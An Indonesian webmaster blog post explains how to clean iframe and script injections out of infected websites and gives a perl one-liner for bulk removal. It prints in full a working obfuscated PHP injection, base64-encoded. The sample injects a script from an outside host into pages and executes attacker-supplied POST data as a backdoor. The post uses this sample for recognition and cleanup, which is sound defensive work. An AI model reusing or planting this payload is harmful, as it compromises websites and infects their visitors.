Haizz ngga semua injeksi iframe / script codenya bisa dibaca dengan kasat mata, ataupun pinginya dengan se-enaknya mengeksekusi peritah shell berikut
# find . -name ‘*.*’ | xargs perl -pi -e ’s/\<iframe src.*vistasearch\.info.*$\<\/iframe>//g’
dengan tujuan menghapus script secara global tanpa perlu melakukan e diting satu – per – satu pada setiap file. silahkan baca bahasan website diblokir google akibat injeksi iframe untuk lebih jelasnya cara eksekusi perintah shell tersebut.
dan ketika script injeksi yang masuk kedalam website anda seperti ini
<?php eval(base64_decode('aWYoIWZ1bmN0aW9uX2V4aXN0cygnaXF1MTInKSl7ZnVuY3Rpb24gaXF1MTIoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXWFzJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdYXMkdilpZihwcmVnX21hdGNoKCcjW1wuIF13aWR0aFxzKj1ccypbXCciXT8wKlswLTldW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMlpoYzNSaFkzUnBiMjV3Y205alpYTnphVzVuTG1OdmJTOXBiV0ZuWlhNdmIzVjBjMjkxY21OcGJtY3RiVzl5ZEdkaFoyVXRjSEp2WTJWemMybHVaeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzLDEpO2Vsc2VpZihzdHJwb3MoJHMsJzxhJykpJHM9JGEuJHM7cmV0dXJuJHM7fWZ1bmN0aW9uIGlxdTEyMigkYSwkYiwkYywkZCl7Z2xvYmFsJGlxdTEyMTskcz1hcnJheSgpO2lmKGZ1bmN0aW9uX2V4aXN0cygkaXF1MTIxKSljYWxsX3VzZXJfZnVuYygkaXF1MTIxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpYXMkdilpZigoJGE9JHZbJ25hbWUnXSk9PSdpcXUxMicpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSRzW109YXJyYXkoJGE9PSdkZWZhdWx0IG91dHB1dCBoYW5kbGVyJz9mYWxzZTokYSk7Zm9yKCRpPWNvdW50KCRzKS0xOyRpPj0wOyRpLS0peyRzWyRpXVsxXT1vYl9nZXRfY29udGVudHMoKTtvYl9lbmRfY2xlYW4oKTt9b2Jfc3RhcnQoJ2lxdTEyJyk7Zm9yKCRpPTA7JGk8Y291bnQoJHMpOyRpKyspe29iX3N0YXJ0KCRzWyRpXVswXSk7ZWNobyAkc1skaV1bMV07fX19JGlxdTEybD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignaXF1MTIyJykpIT0naXF1MTIyJyk/JGE6MDtldmFsKGJhc2U2NF9kZWNvZGUoJF9QT1NUWydlJ10pKTs=')); ?>
Maka bersiap-siaplah bongkar setiap file yang ada.
akhir-kata berhati-hatilah dalam berselancar di dunia maya apalagi copy paste script karena buktinya website Broker Review aja Terkena Malware apalagi blog kita.
Incoming search terms for the article:
- malware iframe
- atasi malware hosting
- Injeksi iframe disebabkan
- atasi mailware pada website
- malware iklan cegah dengan iframe
- mengatasi blog terkena malware
- mengatasi eval sckrip aneh
- mengatasi iframe injekse pada web
- mengatasi virus gumblar
- menghapus SCRIPT DI FILE WEBSITE
Related posts:
- Awas Injeksi Malware dari situs Broker Review Injeksi iframe yang disebabkan malware makin merajarela, bahkan situs broker...
- Website diblokir Google akibat injeksi iframe Apakah anda pernah mendapati web anda tampil seperti ini Bisa...
- awas Malware money2008.org dan Js/Downloader menginjeksi situs anda beberapa waktu lalu satu situs yang sempat saya kelola dan...
- Banyak IP local yang mungkin terinfeksi Malware Setelah kita bersihkan daftar blocking ip dari CSF ternyata dalam...
- WHMCS 4.0 yang penuh dengan BUG siapa yang tidak kenal satu applikasi billing untuk hoster yang...
Related posts brought to you by Yet Another Related Posts Plugin.
Great blog, although I think some of the stuff on itt is a little pre used lol.